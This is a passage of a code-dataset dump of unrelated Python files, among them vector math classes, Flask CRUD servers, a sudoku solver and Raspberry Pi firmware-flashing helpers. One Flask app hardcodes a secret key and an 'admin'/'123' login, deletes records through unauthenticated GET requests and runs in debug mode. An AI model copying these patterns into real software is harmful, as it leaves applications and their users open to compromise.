(3,):\n out_arr = out_arr.view(np.ndarray)\n return out_arr\n\n def __array_finalize__(self, obj):\n \"\"\"This is called when initializing the vector\n\n If the constructor is used, obj is None. If slicing is\n used, obj has the same class as self. In both these cases,\n we let things pass.\n\n If we are viewing another array class as a vector, then obj has\n a different class than self. In this case, if the array has\n an invalid shape a ValueError is raised\n \"\"\"\n if obj is None or obj.__class__ is Vector3:\n return\n if self.shape != (3,):\n raise ValueError(\n 'Invalid array to view as Vector3 - must be length-3 array.'\n )\n\n @property\n def z(self):\n \"\"\"z-component of vector\"\"\"\n return self[2]\n\n @z.setter\n def z(self, value):\n self[2] = value\n\n @property\n def phi(self):\n \"\"\"\n Polar angle / inclination of this vector in radians\n\n Based on sperical coordinate space\n returns angle between this vector and the positive z-azis\n range: (0 <= phi <= pi)\n \"\"\"\n return np.arctan2(np.sqrt(self.x**2 + self.y**2), self.z)\n\n # pylint: disable=fixme\n # TODO: Add `phi` and `phi_deg` setters\n # @phi.setter\n # def phi(self, value):\n # ...\n\n @property\n def phi_deg(self):\n \"\"\"\n Polar angle / inclination of this vector in degrees\n\n Based on sperical coordinate space\n returns angle between this vector and the positive z-azis\n range: (0 <= phi <= pi)\n \"\"\"\n return self.phi * 180 / np.pi\n\n\nclass Vector2(BaseVector):\n \"\"\"Primitive 2D vector defined from the origin\n\n New Vector2 can be created with:\n - another Vector2\n - length-2 array\n - x and y values\n - rho and theta, if polar=True; specify unit as 'rad' (default) or 'deg'\n - no input (returns [0., 0.])\n \"\"\"\n\n def __new__(cls, x=None, y=None, polar=False, unit='rad'): #pylint: disable=arguments-differ\n\n def read_array(X, Y):\n \"\"\"Build Vector2 from another Vector2, [x, y], or x/y\"\"\"\n if isinstance(X, cls) and Y is None:\n if polar:\n raise ValueError('When copying a Vector2, polar=True is not supported')\n return cls(X.x, X.y)\n if (isinstance(X, (list, tuple, np.ndarray)) and len(X) == 2 and\n Y is None):\n return cls(X[0], X[1], polar, unit)\n if X is None and Y is None:\n return cls(0, 0, polar, unit)\n if np.isscalar(X) and np.isscalar(Y):\n if polar:\n if unit not in ['deg', 'rad']:\n raise ValueError('Only units of rad or deg are supported')\n if unit == 'deg':\n Y = Y / 180 * np.pi\n X, Y = X * np.cos(Y), X * np.sin(Y)\n xyz = np.r_[X, Y]\n xyz = xyz.astype(float)\n return xyz.view(cls)\n raise ValueError('Invalid input for Vector2 - must be an instance '\n 'of a Vector2, a length-2 array, 2 scalars, or '\n 'nothing for [0., 0.]')\n\n return read_array(x, y)\n\n def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if out_arr.shape != (2,):\n out_arr = out_arr.view(np.ndarray)\n return out_arr\n\n def __array_finalize__(self, obj):\n if obj is None or obj.__class__ is Vector2:\n return\n if self.shape != (2,):\n raise ValueError(\n 'Invalid array to view as Vector2 - must be length-2 array.'\n )\n\n def cross(self, vec):\n \"\"\"Cross product with another vector\"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Cross product operand must be a vector')\n return Vector3(0, 0, np.asscalar(np.cross(self, vec)))\n\n\nclass BaseVectorArray(BaseVector):\n \"\"\"Class to contain basic operations used by all VectorArray classes\"\"\"\n\n @property\n def x(self):\n \"\"\"Array of x-component of vectors\"\"\"\n return self[:, 0]\n\n @x.setter\n def x(self, value):\n self[:, 0] = value\n\n @property\n def y(self):\n \"\"\"Array of y-component of vectors\"\"\"\n return self[:, 1]\n\n @y.setter\n def y(self, value):\n self[:, 1] = value\n\n @property\n def nV(self):\n \"\"\"Number of vectors\"\"\"\n return self.shape[0]\n\n def normalize(self):\n \"\"\"Scale the length of all vectors to 1 in place\"\"\"\n self.length = np.ones(self.nV)\n return self\n\n @property\n def dims(self):\n \"\"\"Tuple of different dimension names for Vector type\"\"\"\n raise NotImplementedError('Please use Vector2Array or Vector3Array')\n\n @property\n def length(self):\n \"\"\"Array of vector lengths\"\"\"\n return np.sqrt(np.sum(self**2, axis=1)).view(np.ndarray)\n\n @length.setter\n def length(self, l):\n l = np.array(l)\n if self.nV != l.size:\n raise ValueError('Length vector must be the same number of '\n 'elements as vector.')\n # This case resizes all vectors with nonzero length\n if np.all(self.length != 0):\n new_length = l/self.length\n for dim in self.dims:\n setattr(self, dim, new_length*getattr(self, dim))\n return\n # This case only applies to single vectors\n if self.nV == 1 and l == 0:\n assert self.length == 0, \\\n 'Nonzero length should be resized in the first case'\n for dim in self.dims:\n setattr(self, dim, 0.)\n return\n # This case only applies if vectors with length == 0\n # in an array are getting resized to 0\n if self.nV > 1 and np.array_equal(self.length.nonzero(), l.nonzero()): #pylint: disable=no-member\n new_length = l/[x if x != 0 else 1 for x in self.length]\n for dim in self.dims:\n setattr(self, dim, new_length*getattr(self, dim))\n return\n # Error if length zero array is resized to nonzero value\n raise ZeroDivisionError('Cannot resize vector of length 0 to '\n 'nonzero length')\n\n def dot(self, vec):\n \"\"\"Dot product with another vector\"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Dot product operand must be a VectorArray')\n if self.nV != 1 and vec.nV != 1 and self.nV != vec.nV:\n raise ValueError('Dot product operands must have the same '\n 'number of elements.')\n return np.sum((getattr(self, d)*getattr(vec, d) for d in self.dims), 1)\n\n def angle(self, vec, unit='rad'):\n \"\"\"Angle method is only for Vectors, not VectorArrays\"\"\"\n raise NotImplementedError('angle not implemented for VectorArrays')\n\n\nclass Vector3Array(BaseVectorArray):\n \"\"\"List of Vector3\n\n A new Vector3Array can be created with:\n - another Vector3Array\n - x/y/z lists of equal length\n - n x 3 array\n - nothing (returns [[0., 0., 0.]])\n \"\"\"\n\n def __new__(cls, x=None, y=None, z=None): #pylint: disable=arguments-differ\n\n def read_array(X, Y, Z):\n \"\"\"Build Vector3Array from various inputs\"\"\"\n if isinstance(X, cls) and Y is None and Z is None:\n X = np.atleast_2d(X)\n return cls(X.x.copy(), X.y.copy(), X.z.copy())\n if isinstance(X, (list, tuple)):\n X = np.array(X)\n if isinstance(Y, (list, tuple)):\n Y = np.array(Y)\n if isinstance(Z, (list, tuple)):\n Z = np.array(Z)\n if isinstance(X, np.ndarray) and Y is None and Z is None:\n X = np.squeeze(X)\n if X.size == 3:\n X = X.flatten()\n return cls(X[0], X[1], X[2])\n if len(X.shape) == 2 and X.shape[1] == 3:\n return cls(\n X[:, 0].copy(), X[:, 1].copy(), X[:, 2].copy()\n )\n raise ValueError(\n 'Unexpected shape for vector init: {shp}'.format(\n shp=X.shape\n )\n )\n if np.isscalar(X) and np.isscalar(Y) and np.isscalar(Z):\n X, Y, Z = float(X), float(Y), float(Z)\n elif not (isinstance(X, type(Y)) and isinstance(X, type(Z))):\n raise TypeError('Must be the same types for x, y, and '\n 'z for vector init')\n if isinstance(X, np.ndarray):\n if not (X.shape == Y.shape and X.shape == Z.shape):\n raise ValueError('Must be the same shapes for x, y, '\n 'and z in vector init')\n vec_ndarray = np.c_[X, Y, Z]\n vec_ndarray = vec_ndarray.astype(float)\n return vec_ndarray.view(cls)\n if X is None:\n X, Y, Z = 0.0, 0.0, 0.0\n vec_ndarray = np.r_[X, Y, Z].reshape((1, 3))\n return np.asarray(vec_ndarray).view(cls)\n\n return read_array(x, y, z)\n\n def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if len(out_arr.shape) != 2 or out_arr.shape[1] != 3:\n out_arr = out_arr.view(np.ndarray)\n return out_arr\n\n def __array_finalize__(self, obj):\n if obj is None or obj.__class__ is Vector3Array:\n return\n if len(self.shape) != 2 or self.shape[1] != 3: #pylint: disable=unsubscriptable-object\n raise ValueError(\n 'Invalid array to view as Vector3Array - must be '\n 'array of shape (*, 3).'\n )\n\n def __getitem__(self, i):\n \"\"\"Overriding _getitem__ allows coersion to Vector3 or ndarray\"\"\"\n item_out = super(Vector3Array, self).__getitem__(i)\n if np.isscalar(i):\n return item_out.view(Vector3)\n if isinstance(i, slice):\n return item_out\n return item_out.view(np.ndarray)\n\n @property\n def z(self):\n \"\"\"Array of z-component of vectors\"\"\"\n return self[:, 2]\n\n @z.setter\n def z(self, value):\n self[:, 2] = value\n\n @property\n def dims(self):\n return ('x', 'y', 'z')\n\n def cross(self, vec):\n \"\"\"Cross product with another Vector3Array\"\"\"\n if not isinstance(vec, Vector3Array):\n raise TypeError('Cross product operand must be a Vector3Array')\n if self.nV != 1 and vec.nV != 1 and self.nV != vec.nV:\n raise ValueError('Cross product operands must have the same '\n 'number of elements.')\n return Vector3Array(np.cross(self, vec))\n\n\nclass Vector2Array(BaseVectorArray):\n \"\"\"List of Vector2\n\n A new Vector2Array can be created with:\n - another Vector2Array\n - x/y lists of equal length\n - n x 2 array\n - nothing (returns [[0., 0.]])\n \"\"\"\n\n def __new__(cls, x=None, y=None): #pylint: disable=arguments-differ\n\n def read_array(X, Y):\n \"\"\"Build Vector2Array from various inputs\"\"\"\n if isinstance(X, cls) and Y is None:\n X = np.atleast_2d(X)\n return cls(X.x.copy(), X.y.copy())\n if isinstance(X, (list, tuple)):\n X = np.array(X)\n if isinstance(Y, (list, tuple)):\n Y = np.array(Y)\n if isinstance(X, np.ndarray) and Y is None:\n X = np.squeeze(X)\n if X.size == 2:\n X = X.flatten()\n return cls(X[0], X[1])\n if len(X.shape) == 2 and X.shape[1] == 2:\n return cls(\n X[:, 0].copy(), X[:, 1].copy()\n )\n raise ValueError(\n 'Unexpected shape for vector init: {shp}'.format(\n shp=X.shape\n )\n )\n if np.isscalar(X) and np.isscalar(Y):\n X, Y = float(X), float(Y)\n elif not isinstance(X, type(Y)):\n raise TypeError('Must be the same types for x and y '\n 'for vector init')\n if isinstance(X, np.ndarray):\n if X.shape != Y.shape:\n raise ValueError('Must be the same shapes for x and y '\n 'in vector init')\n vec_ndarray = np.c_[X, Y]\n vec_ndarray = vec_ndarray.astype(float)\n return vec_ndarray.view(cls)\n if X is None:\n X, Y = 0.0, 0.0\n vec_ndarray = np.r_[X, Y].reshape((1, 2))\n return np.asarray(vec_ndarray).view(cls)\n\n return read_array(x, y)\n\n def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if len(out_arr.shape) != 2 or out_arr.shape[1] != 2:\n out_arr = out_arr.view(np.ndarray)\n return out_arr\n\n def __array_finalize__(self, obj):\n if obj is None or obj.__class__ is Vector2Array:\n return\n if len(self.shape) != 2 or self.shape[1] != 2: #pylint: disable=unsubscriptable-object\n raise ValueError(\n 'Invalid array to view as Vector2Array - must be '\n 'array of shape (*, 2).'\n )\n\n def __getitem__(self, i):\n \"\"\"Overriding _getitem__ allows coercion to Vector2 or ndarray\"\"\"\n item_out = super(Vector2Array, self).__getitem__(i)\n if np.isscalar(i):\n return item_out.view(Vector2)\n if isinstance(i, slice):\n return item_out\n return item_out.view(np.ndarray)\n\n @property\n def dims(self):\n return ('x', 'y')\n","sub_path":"vectormath/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":20407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"118906329","text":"from flask import Flask, request\r\nfrom mysqlhandler import sqlhandler\r\n\r\n# create the Flask app\r\napp = Flask(__name__)\r\n\r\n\r\n\r\n@app.route('/user/add',methods=['POST'])\r\ndef add(): \r\n \r\n data=request.get_json()\r\n \r\n sqlhandler.func(data,1)\r\n return(\"User Added\")\r\n\r\n@app.route('/user/delete',methods=['POST'])\r\ndef delete(): \r\n \r\n data=request.get_json()\r\n \r\n sqlhandler.func(data,3)\r\n return(\"User Deleted\")\r\n\r\n@app.route('/user/update',methods=['POST'])\r\ndef update(): \r\n \r\n data=request.get_json()\r\n \r\n sqlhandler.func(data,2)\r\n return(\"User Updated\")\r\n\r\n@app.route('/user/view',methods=['GET'])\r\ndef display(): \r\n data=dict()\r\n sqlhandler.func(data,4)\r\n return(\"Info Displayed on Terminal\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # run app in debug mode on port 5000\r\n app.run(debug=True)","sub_path":"lab_3/dbhandler/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"233986219","text":"import pytest\n\nfrom kestrel.session import Session\n\n\ndef test_copy_and_merge():\n with Session() as s:\n stmt = \"\"\"\nnewips = NEW ipv4-addr [\"127.0.0.1\", \"127.0.1.15\"]\nip2 = NEW ipv4-addr [\"10.0.1.1\", \"10.0.2.2\", \"10.0.3.3\"]\nip1 = newips\nip3 = ip1 + ip2\n\"\"\"\n s.execute(stmt)\n newips = s.get_variable(\"newips\")\n assert len(newips) == 2\n assert newips[0][\"type\"] == \"ipv4-addr\"\n values = [newips[i][\"value\"] for i in [0, 1]]\n values.sort()\n assert values == [\"127.0.0.1\", \"127.0.1.15\"]\n\n ip2 = s.get_variable(\"ip2\")\n assert len(ip2) == 3\n assert ip2[0][\"type\"] == \"ipv4-addr\"\n values = [row[\"value\"] for row in ip2]\n values.sort()\n assert values == [\"10.0.1.1\", \"10.0.2.2\", \"10.0.3.3\"]\n\n ip1 = s.get_variable(\"ip1\")\n assert len(ip1) == 2\n assert ip1[0][\"type\"] == \"ipv4-addr\"\n values = [row[\"value\"] for row in ip1]\n values.sort()\n assert values == [\"127.0.0.1\", \"127.0.1.15\"]\n\n ip3 = s.get_variable(\"ip3\")\n assert len(ip3) == 5\n assert ip3[0][\"type\"] == \"ipv4-addr\"\n values = [row[\"value\"] for row in ip3]\n values.sort()\n assert values == [\"10.0.1.1\", \"10.0.2.2\", \"10.0.3.3\", \"127.0.0.1\", \"127.0.1.15\"]\n","sub_path":"tests/test_command_merge.py","file_name":"test_command_merge.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"467530986","text":"import datetime\n\nfrom sqlalchemy import func\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy_utils import IPAddressType\n\nfrom lessee import db\n\nPLATFORM_LIST = (\n 'PC',\n 'PS4',\n 'XboxOne',\n)\n\n\ndef populate_platforms():\n platforms = Platform.query.all()\n if not platforms:\n for platform_name in PLATFORM_LIST:\n new_platform = Platform(name=platform_name)\n db.session.add(new_platform)\n db.session.commit()\n\n\nclass BaseMixin(object):\n id = db.Column(\n db.Integer,\n index=True,\n autoincrement=True,\n primary_key=True\n )\n\n\nclass TimestampMixin(object):\n created_at = db.Column(\n db.DateTime,\n default=func.now()\n )\n modified_at = db.Column(\n db.DateTime,\n default=func.now(),\n onupdate=func.now()\n )\n\n\nclass Platform(db.Model, BaseMixin):\n name = db.Column(db.String(50), unique=True)\n hardwares = db.relationship('Hardware', backref='platform', lazy=True)\n\n def __init__(self, name):\n self.name = name\n\n\nclass Hardware(db.Model, BaseMixin, TimestampMixin):\n name = db.Column(\n db.String(80),\n unique=True,\n )\n ip = db.Column(\n IPAddressType,\n unique=True,\n )\n platform_id = db.Column(\n db.Integer,\n db.ForeignKey('platform.id'),\n )\n leases = db.relationship('Lease', backref='hardware', lazy='dynamic')\n __table_args__ = (\n db.UniqueConstraint(\n 'ip',\n 'platform_id',\n 'name',\n ),\n )\n\n def __init__(self, name, ip, platform):\n self.name = name\n self.ip = ip\n self.platform = platform\n\n @hybrid_property\n def leased(self):\n if self.status == 'leased':\n return True\n return False\n\n @hybrid_property\n def status(self):\n lease_query = Lease.query.filter_by(\n hardware_id=self.id\n )\n if lease_query.count():\n now = datetime.datetime.now()\n if lease_query.filter(\n Lease.start < now,\n Lease.end > now,\n ).count():\n return 'leased'\n return 'available'\n\n\nclass Lease(db.Model, BaseMixin, TimestampMixin):\n hardware_id = db.Column(\n db.Integer,\n db.ForeignKey('hardware.id'),\n )\n start = db.Column(db.DateTime)\n end = db.Column(db.DateTime)\n\n def __init__(self, hardware, start, end):\n self.hardware = hardware\n self.start = start\n self.end = end","sub_path":"lessee/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"296889582","text":"#find min number of coins from di==given coins to make given sum\n\ncoins=list(map(int, input('Enter coins (separated by space) : ').split()))\nw=int(input('Enter sum : '))\n\nif min(coins)>w:\n\tprint(\"Invalid data.\")\n\texit()\n\nans=[[]]\n\nfor i in range(0,len(coins)):\n\tans.append([0])\nfor j in range(0,w+1):\n\tans[0].append(j)\n\nfor i in range(1,len(coins)+1):\n\tfor j in range(1,w+1):\n\t\tif coins[i-1]>j:\n\t\t\tans[i].append(ans[i-1][j])\n\t\telse:\n\t\t\tt=coins[i-1]\n\t\t\ta=min(j,(1+(ans[i][j-t])))\n\t\t\tans[i].append(a)\n\t\t\t\nprint(ans[-1][-1])\n","sub_path":"coinchange1.py","file_name":"coinchange1.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"301415902","text":"import pandas as pd\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n# %matplotlib inline\n\n# Loading dataset\ndataset = pd.read_csv('input_data.csv')\nprint (len(dataset))\nprint (dataset.columns.values)\n\n#split dataset\ndef split_data(dataset):\n square_feet_values = []\n price_values = []\n for square_feet, price in zip(dataset['square_feet'], dataset['price']):\n square_feet_values.append([square_feet])\n price_values.append(price)\n return square_feet_values, price_values\n\ntrain_x, train_y = split_data(dataset)\nprint (train_x)\nprint (train_y)\n\n#build simple regression model\nregr = linear_model.LinearRegression()\nregr.fit(train_x, train_y)\n\n#fit the model\nplt.scatter(train_x, train_y, color = 'blue')\nplt.plot(train_x, regr.predict(train_x), color = 'red', linewidth = 4)\n# plt.show()\n\n#predict price for 700sq\nprediction = regr.predict(700)\nprint(prediction)\n\n#extra\nplt.scatter(700, prediction, color = 'red')\nplt.show()\n","sub_path":"Data Mining with Python_Implementing Classification and Regression/12_Basic Regression Model Implementation to Predict House Prices.py","file_name":"12_Basic Regression Model Implementation to Predict House Prices.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"399039663","text":"from time import sleep\r\nimport os\r\n\r\n\r\ndef com_init():\r\n error_msg = \"\"\"\r\n SMBus(1) - error\\nI2C communication doesn't work properly\r\n Check if I2C interface is enabled with 'sudo raspi-config'\r\n May try manually install smbus with 'sudo apt install python3-smbus'\r\n \"\"\"\r\n err_time = 1\r\n bus = 0\r\n try:\r\n from smbus import SMBus # works only on Pi\r\n bus = SMBus(1) # indicates /dev/ic2-1 - correct i2c bus for most Pies\r\n except PermissionError as perm_error:\r\n print(error_msg)\r\n print(perm_error)\r\n sleep(err_time)\r\n except NameError as name_error:\r\n print(error_msg)\r\n print(name_error)\r\n sleep(err_time)\r\n except ModuleNotFoundError as no_mod_err:\r\n print(error_msg)\r\n print(no_mod_err)\r\n sleep(err_time)\r\n finally:\r\n return bus\r\n\r\n\r\ndef reset_gpio_pin(gpio_reset_pin):\r\n try:\r\n import RPi.GPIO as GPIO\r\n GPIO.setwarnings(False)\r\n GPIO.setmode(GPIO.BCM) # Use BCM pin numbering\r\n GPIO.setup(gpio_reset_pin, GPIO.OUT, initial=GPIO.HIGH)\r\n GPIO.output(gpio_reset_pin, GPIO.HIGH)\r\n sleep(0.1)\r\n GPIO.output(gpio_reset_pin, GPIO.LOW)\r\n print(\"gpio pin reset\")\r\n sleep(0.1)\r\n GPIO.output(gpio_reset_pin, GPIO.HIGH)\r\n sleep(0.1)\r\n except AttributeError:\r\n print(\"AttributeError - that feature works only on Pi\")\r\n sleep(1)\r\n except NameError:\r\n print(\"NameError - that feature works only on Pi\")\r\n sleep(1)\r\n except ModuleNotFoundError:\r\n print(\"GPIO import - failed - works only on Pi\")\r\n sleep(1)\r\n\r\n\r\ndef prepare_mate_node(addr):\r\n def calculate_checksum(data):\r\n checksum = sum(data) & 0xFF\r\n return checksum\r\n\r\n bus = com_init()\r\n sleep_amt = 1\r\n on, off = [1], [0]\r\n reset_mate_node_command = 0x79\r\n on.append(calculate_checksum(on))\r\n off.append(calculate_checksum(off))\r\n sleep(sleep_amt)\r\n bus.write_i2c_block_data(addr, reset_mate_node_command, on)\r\n print(\"on command sent\")\r\n sleep(sleep_amt)\r\n bus.write_i2c_block_data(addr, reset_mate_node_command, off)\r\n print(\"off command sent\")\r\n sleep(sleep_amt)\r\n bus.write_i2c_block_data(addr, reset_mate_node_command, on)\r\n print(\"on command sent\")\r\n sleep(0.2)\r\n\r\n\r\ndef flash_mate_node(config, firmware_version):\r\n avrdude_action = f\"avrdude -v -p atmega328p -c arduino -P /dev/{config.port_name} -b 57600 -U \\\r\n flash:w:/home/{config.user}/RH-ota/firmware/{firmware_version}.hex:i\"\r\n os.system(f\"{avrdude_action}\")\r\n\r\n\r\ndef main():\r\n print(\"Use file nodes_flash.py as a opening file instead\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"nodes_flash_common.py","file_name":"nodes_flash_common.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"487567419","text":"'''\nWidget animation\n================\n\nThis is showing an example of a animation creation, and how you can apply yo a\nwidget.\n'''\n\nimport kivy\nimport math\nkivy.require('1.0.7')\n\nfrom kivy.animation import Animation\nfrom kivy.app import App\nfrom kivy.uix.button import Button\n\n\nclass TestApp(App):\n\n def animate(self, instance):\n divisor = 3\n max_rad = math.pi/2\n increment = math.pi/divisor\n animation = Animation(pos=(300, 200), t='linear')\n for i in range(1,math.floor (max_rad/increment) + 1):\n # create an animation object. \n animation = animation + Animation(pos=(math.cos(increment*i)*100+200, math.sin(increment*i)*100+200), t='linear')\n\n # apply the animation on the button, passed in the \"instance\" argument\n animation.start(instance)\n\n def build(self):\n # create a button, and attach animate() method as a on_press handler\n button = Button(size_hint=(None, None), text='plop', pos=(200, 200))\n button.bind(on_press=self.animate)\n return button\n\nif __name__ in ('__main__', '__android__'):\n TestApp().run()\n\n","sub_path":"CircularAnimation/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"431596777","text":"class Solution:\r\n def solveSudoku(self, board: List[List[str]]) -> None:\r\n \"\"\"\r\n Do not return anything, modify board in-place instead.\r\n \"\"\"\r\n self.rows = [set(range(1, 10)) for _ in range(9)]\r\n self.cols = [set(range(1, 10)) for _ in range(9)]\r\n self.block = [set(range(1, 10)) for _ in range(9)]\r\n self.empty = []\r\n for row in range(9):\r\n for col in range(9):\r\n if board[row][col] != '.':\r\n cur = int(board[row][col])\r\n self.rows[row].remove(cur)\r\n self.cols[col].remove(cur)\r\n self.block[(row//3)*3+(col//3)].remove(cur)\r\n else:\r\n self.empty.append((row, col))\r\n self.backtrack(board, 0)\r\n\r\n def backtrack(self, board, iter):\r\n if iter == len(self.empty):\r\n return True\r\n i, j = self.empty[iter]\r\n b = (i // 3) * 3 + (j // 3)\r\n for val in self.rows[i] & self.cols[j] & self.block[b]:\r\n self.rows[i].remove(val)\r\n self.cols[j].remove(val)\r\n self.block[b].remove(val)\r\n board[i][j] = str(val)\r\n if self.backtrack(board, iter + 1):\r\n return True\r\n self.rows[i].add(val)\r\n self.cols[j].add(val)\r\n self.block[b].add(val)\r\n return False","sub_path":"Week_07/sudoku-solver.py","file_name":"sudoku-solver.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"29186743","text":"#!/usr/bin/env python3\n\n'''\nCOPYRIGHT Dazzy Ding, Peter Zhang 2015-2016\n'''\n\nimport sys\n\n# 游戏左上角坐标\nif sys.platform == 'darwin':\n base = (0, 23)\nif sys.platform == 'linux':\n base = (0, 23)\nif sys.platform == 'win32':\n base = (0, 30)\n\n# 配置系统屏幕大小,常用值\n# screen_size = (1680, 1050) # Macbook Pro\n# screen_size = (1600, 900) # Linux VM\n# screen_size = (1920, 1080) # Windows\n\n# API 服务器监听端口\nhost = (\"127.0.0.1\", 14585)\n\npoi_interaction = False\n","sub_path":"config.example.py","file_name":"config.example.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"340059827","text":"import struct\n\nimport sbigpy\n\nclass Temp_Status:\n def __init__(self):\n self.enabled = 0\n self.setpoint = 0\n self.output = 0\n self.samp_rate = sbigpy.ST5.DEFAULT_TEMP_SAMP_RATE\n self.p_gain = sbigpy.ST5.DEFAULT_TEMP_P_GAIN\n self.i_gain = sbigpy.ST5.DEFAULT_TEMP_I_GAIN\n self.brownout_detected = 0\n\n def unpack(self, data):\n (self.enabled,\n self.setpoint,\n self.output,\n self.samp_rate,\n self.p_gain,\n self.i_gain,\n self.brownout_detected) = struct.unpack('<7H', data)\n\n def prettyprint(self):\n print(\"Temp control enabled: %d\" % self.enabled)\n print(\"Temp setpoint: %d\" % self.setpoint)\n print(\"Temp output drive: %d\" % self.output)\n print(\"Temp sample rate: %d\" % self.samp_rate)\n print(\"Temp p_gain: %d\" % self.p_gain)\n print(\"Temp i_gain: %d\" % self.i_gain)\n print(\"Temp brownout detected: %d\" % self.brownout_detected)","sub_path":"sbigpy/temp_status.py","file_name":"temp_status.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"111767357","text":"from flask import Flask, render_template, request, redirect, session, jsonify\nfrom usuario import Usuario\nfrom veiculo import Veiculo\nfrom peewee import *\nimport os\nfrom playhouse.shortcuts import model_to_dict\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '43r78934yt6y5907'\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n@app.route('/Cliente')\ndef Cliente():\n usuarios = list(map(model_to_dict, Usuario.select()))\n return jsonify(usuarios)\n@app.route('/Veiculos')\ndef Veiculos():\n veiculos = list(map(model_to_dict, Veiculo.select()))\n return jsonify(veiculos)\n@app.route('/Diagnosticos')\ndef Diagnostico():\n return render_template('Diagnosticos.html')\n\n\n@app.route(\"/incluirUsuario\", methods = ['post'])\ndef incluir():\n \n msg = jsonify({\"message\":\"ok\"})\n\n dados = request.get_json(force = True)\n\n nome= dados['nome']\n snome= dados['snome']\n sexo= dados['sexo']\n email= dados['email']\n tel= dados['telefone']\n cidade= dados['cidade']\n estado= dados['estado']\n Usuario.create(nome = nome, sobrenome = snome, sexo = sexo, email = email, telefone = tel, cidade= cidade\n , estado = estado)\n\n return msg\n\n@app.route(\"/incluirVeiculo\", methods = ['post'])\ndef incluirV():\n marca= request.form[\"marca\"]\n modelo= request.form[\"modelo\"]\n chassi= request.form[\"sexo\"]\n nome= request.form[\"nome\"] \n nmrPlaca= request.form[\"nmrPlaca\"]\n ano= request.form[\"ano\"]\n Veiculo.create(marca = marca, modelo = modelo, chassi = chassi, nome = nome, nmrPlaca = nmrPlaca, ano = ano)\n \n\n return redirect(\"/Veiculos\")\n\n@app.route(\"/excluir_usuario\")\ndef excluir_usuario():\n \n id = request.args.get(\"id\")\n\n Usuario.delete_by_id(id)\n \n return Cliente()\n\n@app.route(\"/Alt_cliente\")\ndef Alt_cliente():\n \n id = request.args.get(\"id\")\n \n usuario_alt = Usuario.get_by_id(id)\n \n return render_template(\"Alt_cliente.html\", usuario=usuario_alt)\n \n\n@app.route(\"/alterar_usuario\")\ndef alterar_usuario():\n id = request.args.get(\"id\")\n nome= request.args.get(\"nome\")\n snome= request.args.get(\"snome\")\n sexo= request.args.get(\"sexo\")\n email= request.args.get(\"email\")\n tel= request.args.get(\"telefone\")\n cidade= request.args.get(\"cidade\")\n estado= request.args.get(\"estado\")\n usuario = Usuario.get_by_id(id)\n \n usuario.nome = nome\n usuario.sobrenome = snome\n usuario.sexo = sexo\n usuario.email = email\n usuario.telefone = tel\n usuario.cidade = cidade\n usuario.estado = estado\n \n\n usuario.save()\n\n return redirect(\"Cliente\")\n\n@app.route(\"/login\", methods=['POST'])\ndef login():\n login = request.form[\"login\"]\n senha = request.form[\"senha\"]\n if login == 'admin' and senha == '123':\n session['usuario'] = login\n return redirect(\"/\")\n else:\n return render_template('Login.html')\n\n@app.route(\"/logout\")\ndef logout(): \n session.pop(\"usuario\")\n return redirect(\"/\")\n\n\napp.run(debug=True, port=4001)\n\n\n","sub_path":"SIMUCAR/Trabalho_Pt3/index_back.py","file_name":"index_back.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"242663903","text":"# -*- coding:utf-8 -*-\n\n# 题目(循环小数)\n\"\"\"\n循环小数可以表示成分数,现在有整数部分为 0 的循环小数 a(a>0.1),\na 的循环节从十分位开始有若干位,将 a 表示成最简分数 n/m 的形式\n\"\"\"\n\n# 算法\n\"\"\"\nx = 0.77777...\n10x = 7.7777...(10为循环位数)\n9x = 7(减去小数部分)\nx = 7/9\n\"\"\"\n\n# 输入格式\n\"\"\"\n一个循环小数,只显示到它的第一个循环节,比如 0.7 表示循环小数 0.777777...\n\"\"\"\n\n# 输出格式\n\"\"\"\n循环小数对应的最简分数 n/m\n\"\"\"\n\n# 输入样例\n\"\"\"\n0.7\n\"\"\"\n\n# 输出格式\n\"\"\"\n7/9\n\"\"\"\n\n\ndef Euclidean(a, b):\n \"\"\" 欧几里得算法(辗转相除法) \"\"\"\n if a < b:\n # a 存大数\n a, b = b, a\n while b != 0:\n temp = a % b # 余数\n a = b\n b = temp\n return a\n\ndef Decimal_to_Fraction(decimal):\n 